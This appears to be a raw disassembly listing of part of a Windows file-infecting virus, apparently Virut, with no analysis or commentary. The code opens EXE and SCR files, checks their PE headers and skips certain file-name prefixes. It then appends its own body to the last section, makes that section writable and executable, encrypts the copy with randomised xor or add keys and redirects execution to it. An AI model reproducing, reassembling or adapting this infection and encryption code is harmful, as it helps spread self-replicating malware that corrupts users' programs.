mov esi, [ebp+403972h]
call sub_40AE18
popa
loc_40B7A3: ; CODE XREF: sub_40B790-26�j
test eax, 80000000h
jnz short loc_40B7B8
loc_40B7AA: ; CODE XREF: sub_40B790-3�j
sub eax, [edi+0Ch]
jb short loc_40B7B8
cmp eax, [edi+8]
jb loc_40B6F4
loc_40B7B8: ; CODE XREF: sub_40B790-F9�j
; sub_40B790-EB�j ...
dec ecx
jnz loc_40B671
loc_40B7BF: ; CODE XREF: sub_40B5D7+9�j
; .rsrc:0040B659�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+2431h], 7FFFFFFFh
jmp short loc_40B80A
; ---------------------------------------------------------------------------
loc_40B7CE: ; CODE XREF: sub_40B790-7F�j
; sub_40B790-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+4039AEh]
lea edi, [ecx+2435h]
add eax, [ebp+403972h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+52h], 5
mov [esi-4], eax
loc_40B80A: ; CODE XREF: sub_40B790+3C�j
pop edi
pop esi
retn
sub_40B790 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B80D proc near ; CODE XREF: .rsrc:0040B9DB�p
; sub_40BA03+127�p
lea esi, [ebp+40384Eh]
push esi
call dword ptr ss:loc_40357C[ebp]
cmp eax, 0FFFFFFFFh
jz locret_40B8DE
mov [ebp+403952h], eax
push 0
push esi
call dword ptr [ebp+4035B4h]
test eax, eax
jz locret_40B8DE
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+40355Ch]
cmp eax, 0FFFFFFFFh
jz loc_40BD96
mov [ebp+403956h], eax
lea ecx, loc_40395A[ebp]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+403584h]
cmp eax, 0FFFFFFFFh
jz loc_40BD8A
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+403580h]
cmp eax, 0FFFFFFFFh
jz loc_40BD8A
mov dword ptr ss:loc_40396A[ebp], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+403956h]
call dword ptr ss:loc_403560[ebp]
test eax, eax
jz loc_40BD8A
xor ecx, ecx
mov dword ptr ss:loc_40396E[ebp], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+4035A0h]
test eax, eax
jz loc_40BD62
mov [ebp+403972h], eax
locret_40B8DE: ; CODE XREF: sub_40B80D+10�j
; sub_40B80D+27�j ...
retn
sub_40B80D endp
; =============== S U B R O U T I N E =======================================
sub_40B8DF proc near ; CODE XREF: sub_40BA03+117�p
; sub_40BA03+223�p
mov eax, 69CDh
mov ecx, [ebx+38h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_40B8F9
add eax, dword ptr ss:loc_40106D[ebp]
loc_40B8F9: ; CODE XREF: sub_40B8DF+12�j
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+40397Ah], eax
mov eax, 243Bh
mov ecx, [ebx+3Ch]
add eax, dword ptr ss:loc_40106D[ebp]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov dword ptr ss:loc_403976[ebp], eax
retn
sub_40B8DF endp
; =============== S U B R O U T I N E =======================================
sub_40B924 proc near ; CODE XREF: sub_40BA03:loc_40BA52�p
; sub_40BA03+13D�p
movzx ecx, word ptr [ebx+6]
stc
loc_40B929: ; CODE XREF: sub_40B924+23�j
jecxz short locret_40B960
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_40B960
cmp dword ptr [edx+0Ch], 1
jb short loc_40B929
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, dword ptr ss:loc_40396A[ebp]
locret_40B960: ; CODE XREF: sub_40B924:loc_40B929�j
; sub_40B924+1D�j ...
retn
sub_40B924 endp
; =============== S U B R O U T I N E =======================================
sub_40B961 proc near ; CODE XREF: .rsrc:0040B9ED�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_40B961 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_40B96E: ; CODE XREF: .rsrc:0040B98F�j
mov ecx, edi
jmp short loc_40B97D
; ---------------------------------------------------------------------------
lea edi, [ebp+40384Eh]
cld
loc_40B979: ; CODE XREF: .rsrc:0040B98B�j
mov ebx, edi
xor ecx, ecx
loc_40B97D: ; CODE XREF: .rsrc:0040B970�j
; .rsrc:0040B993�j
lodsb
cmp al, 61h
jb short loc_40B988
cmp al, 7Ah
ja short loc_40B988
sub al, 20h
loc_40B988: ; CODE XREF: .rsrc:0040B980�j
; .rsrc:0040B984�j
stosb
cmp al, 5Ch
jz short loc_40B979
cmp al, 2Eh
jz short loc_40B96E
cmp al, 0
jnz short loc_40B97D
jecxz short locret_40B960
mov eax, [ecx]
cmp eax, 455845h
jz short loc_40B9AB
cmp eax, 524353h
jnz locret_40B8DE
loc_40B9AB: ; CODE XREF: .rsrc:0040B99E�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_40B8DE
cmp eax, 4E554357h
jz locret_40B8DE
cmp eax, 32334357h
jz locret_40B8DE
cmp eax, 4F545350h
jz locret_40B8DE
xor ebx, ebx
call sub_40B80D
jz locret_40B8DE
xor edx, edx
call sub_40BA03
call sub_40B961
call $+5
pop ebp
sub ebp, 402F8Ah
jmp loc_40BD40
; =============== S U B R O U T I N E =======================================
sub_40BA03 proc near ; CODE XREF: .rsrc:0040B9E8�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+403972h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_40BD40
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_40BD40
test dword ptr [ebx+16h], 2000h
jnz loc_40BD40
test byte ptr [ebx+5Ch], 2
mov ecx, [esi+20h]
jz loc_40BD40
jecxz short loc_40BA52
cmp ecx, 101h
jbe loc_40BD40
loc_40BA52: ; CODE XREF: sub_40BA03+41�j
call sub_40B924
jb loc_40BD40
mov ecx, [edx+10h]
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call sub_40A55C
xor byte ptr ss:loc_40342F[ebp], dl
mov cl, 20h
xor [ebp+403430h], dh
loc_40BA7C: ; CODE XREF: sub_40BA03+92�j
push 20h
dec cl
pop eax
js short loc_40BA97
call sub_40A55C
test edx, edx
setz dl
shl edx, cl
xor [ebp+403431h], edx
jmp short loc_40BA7C
; ---------------------------------------------------------------------------
loc_40BA97: ; CODE XREF: sub_40BA03+7E�j
; sub_40BA03+CD�j ...
push 6
pop ecx
loc_40BA9D: ; CODE XREF: sub_40BA03+B8�j
push 6
pop eax
call sub_40A55C
mov al, [ebp+403429h]
xchg al, [edx+ebp+403429h]
mov [ebp+403429h], al
loop loc_40BA9D
test dword ptr [ebp+403431h], 8
jnz short loc_40BAD2
cmp byte ptr [ebp+40342Bh], 1
jz short loc_40BA97
loc_40BAD2: ; CODE XREF: sub_40BA03+C4�j
test dword ptr [ebp+403431h], 1000003h
jz short loc_40BAF9
cmp byte ptr [ebp+403429h], 5
jz short loc_40BA97
cmp byte ptr ss:loc_40342A[ebp], 5
jz short loc_40BA97
cmp byte ptr [ebp+40342Bh], 5
jz short loc_40BA97
loc_40BAF9: ; CODE XREF: sub_40BA03+D9�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_40BB0E
cmp byte ptr [ebp+403429h], 2
ja short loc_40BA97
loc_40BB0E: ; CODE XREF: sub_40BA03+100�j
and dword ptr [ebp+4039AEh], 0
call loc_40AFA9
call sub_40B8DF
call sub_40BD49
mov ebx, dword ptr ss:loc_403976[ebp]
call sub_40B80D
jz loc_40BD40
mov esi, [ebp+403972h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_40B924
jb loc_40BD40
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
jnz short loc_40BB76
lea esi, [ebp+40343Ch]
mov ecx, dword ptr ss:loc_40106D[ebp]
rep movsb
loc_40BB76: ; CODE XREF: sub_40BA03+163�j
push edi
mov ecx, 90Fh
lea esi, sub_401000[ebp]
rep movsd
mov cl, 0
jecxz short loc_40BB8A
rep movsb
loc_40BB8A: ; CODE XREF: sub_40BA03+183�j
test dword ptr [ebp+403431h], 10000000h
jz loc_40BC42
push dword ptr [ebx+28h]
call sub_40AD11
mov edx, [ebp+4039A6h]
test edx, edx
jz loc_40BC42
mov esi, [ebp+403972h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_40BBC7
xor ecx, ecx
loc_40BBC7: ; CODE XREF: sub_40BA03+1C0�j
add esi, [edx+14h]
cmp ecx, dword ptr ss:loc_40106D[ebp]
mov ecx, dword ptr ss:loc_40106D[ebp]
jb short loc_40BC2E
mov edi, [esp+14h+var_14]
and dword ptr ss:loc_40106D[ebp], 0
and dword ptr [edi+6Dh], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+403986h]
test dword ptr [ebp+403431h], 40h
jz short loc_40BC07
neg dword ptr [eax]
loc_40BC07: ; CODE XREF: sub_40BA03+200�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+4039AEh], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+403431h], 40h
jz short loc_40BC25
neg dword ptr [eax]
loc_40BC25: ; CODE XREF: sub_40BA03+21E�j
push ecx
call sub_40B8DF
pop ecx
jmp short loc_40BC3A
; ---------------------------------------------------------------------------
loc_40BC2E: ; CODE XREF: sub_40BA03+1D3�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_40BC3A: ; CODE XREF: sub_40BA03+229�j
lea esi, [ebp+40343Ch]
rep movsb
loc_40BC42: ; CODE XREF: sub_40BA03+191�j
; sub_40BA03+1A7�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+1D2h]
cmp dl, byte ptr ss:loc_40342F[ebp]
jnz short loc_40BC5B
imul edx, 12345678h
loc_40BC5B: ; CODE XREF: sub_40BA03+250�j
mov [eax-1], dl
call sub_409C2F
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+403431h], 10000000h
lea eax, [ecx+6]
jnz short loc_40BC8C
mov [ebp+4039AEh], ecx
add eax, dword ptr ss:loc_40106D[ebp]
and dword ptr [edi+6Dh], 0
loc_40BC8C: ; CODE XREF: sub_40BA03+274�j
sub eax, [ebx+28h]
push dword ptr [ebp+40397Eh]
mov [edi+52h], eax
pop dword ptr [esi+20h]
test dword ptr [ebp+403431h], 80000000h
jz short loc_40BCB1
push edx
call sub_40B5D7
pop edx
loc_40BCB1: ; CODE XREF: sub_40BA03+2A5�j
mov ecx, [ebp+4039AEh]
jecxz short loc_40BCBC
mov [ebx+28h], ecx
loc_40BCBC: ; CODE XREF: sub_40BA03+2B4�j
mov ecx, [edx+10h]
mov eax, dword ptr ss:loc_403976[ebp]
cmp [edx+8], ecx
jnb short loc_40BCCD
mov [edx+8], ecx
loc_40BCCD: ; CODE XREF: sub_40BA03+2C5�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+40397Ah]
push 243Ch
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, byte ptr ss:loc_40342F[ebp]
test dword ptr [ebp+403431h], 10000000h
jz short loc_40BCFE
add ecx, dword ptr ss:loc_40106D[ebp]
loc_40BCFE: ; CODE XREF: sub_40BA03+2F3�j
mov dh, 0
test dword ptr [ebp+403431h], 20000h
jnz short loc_40BD20
inc dh
test dword ptr [ebp+403431h], 40000h
jnz short loc_40BD20
mov dh, [ebp+403430h]
loc_40BD20: ; CODE XREF: sub_40BA03+307�j
; sub_40BA03+315�j
test dword ptr [ebp+403431h], 4000h
jnz short loc_40BD37
loc_40BD2C: ; CODE XREF: sub_40BA03+330�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_40BD2C
jmp short loc_40BD40
; ---------------------------------------------------------------------------
loc_40BD37: ; CODE XREF: sub_40BA03+327�j
; sub_40BA03+33B�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_40BD37
loc_40BD40: ; CODE XREF: .rsrc:0040B9FE�j
; sub_40BA03+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_40BA03 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40BD49 proc near ; CODE XREF: sub_40BA03+11C�p
cmp dword ptr [ebp+403956h], 0
jz locret_40B8DE
push dword ptr [ebp+403972h]
call dword ptr ss:loc_4035C4[ebp]
loc_40BD62: ; CODE XREF: sub_40B80D+C5�j
push dword ptr ss:loc_40396E[ebp]
call dword ptr [ebp+40353Ch]
lea ecx, loc_40395A[ebp]
lea edx, [ebp+403962h]
push ecx
push edx
push 0
push dword ptr [ebp+403956h]
call dword ptr [ebp+4035B8h]
loc_40BD8A: ; CODE XREF: sub_40B80D+6B�j
; sub_40B80D+82�j ...
push dword ptr [ebp+403956h]
call dword ptr [ebp+40353Ch]
loc_40BD96: ; CODE XREF: sub_40B80D+45�j
lea esi, [ebp+40384Eh]
push dword ptr [ebp+403952h]
push esi
call dword ptr [ebp+4035B4h]
and dword ptr [ebp+403956h], 0
retn
sub_40BD49 endp
; ---------------------------------------------------------------------------
db 0E8h, 2 dup(0)
dd 6A5D0000h, 49ED8101h, 58004033h, 85C10FF0h, 401580h
dd 83C3C085h, 0FF0FFC8h, 158085C1h, 3DC30040h, 2A0010h
dd 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h, 0E80575FFh
dd 0FFFFFB7Eh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh, 25B812h
dd 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h, 40384Eh
dd 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh, 95FF5052h
dd 4035F8h, 8108C483h, 3F3F5C3Eh, 8303755Ch, 2BE804C6h
dd 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h, 2FB8B1h
dd 10E80000h, 0C2000000h, 30B80020h, 0E8000000h, 3, 8D0024C2h
dd 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
; ---------------------------------------------------------------------------
mov edx, [esp+30h]
pop ebp
mov ebx, [edx]
sub ebp, 403413h
call sub_40A3CB
popa
retn 4
; ---------------------------------------------------------------------------
dw 201h
dd 5060307h, 84945A4Dh, 15FF4BFCh, 1001194h, 90h, 3Fh dup(0)
dd 809B4700h, 8308AD7Ch, 9103317Ch, 80ADA07Ch, 7Ch, 2 dup(0)
dd 80BDB600h, 801A247Ch, 80945C7Ch, 8023677Ch, 81042C7Ch
dd 8106377Ch, 864B0F7Ch, 80C0587Ch, 80E7EC7Ch, 81153C7Ch
dd 810A777Ch, 831C457Ch, 80B6A17Ch, 8608FF7Ch, 835DCA7Ch
dd 8111DA7Ch, 812ADE7Ch, 801D777Ch, 80B9057Ch, 80BB767Ch
dd 8309E17Ch, 863DE57Ch, 863F587Ch, 8127827Ch, 831CB87Ch
dd 8024427Ch, 810B1C7Ch, 80B9747Ch, 809A517Ch, 810D877Ch
dd 90D4607Ch, 90D6827Ch, 90D7547Ch, 90D7697Ch, 90D7937Ch
dd 90DC557Ch, 90DCFD7Ch, 90DD907Ch, 90DEB67Ch, 90EA327Ch
dd 9130C67Ch, 7Ch, 14h dup(0)
dd 380036h, 40C0C4h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 5F0032h, 690056h, 740072h, 75h, 0BBh dup(0)
dd 79000000h, 0Dh dup(0)
dd 7FFDD0h, 4EFBh dup(0)
_rsrc ends
; Section 3. (virtual address 00021000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00020200
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 421000h
align 2000h
_idata2 ends
end start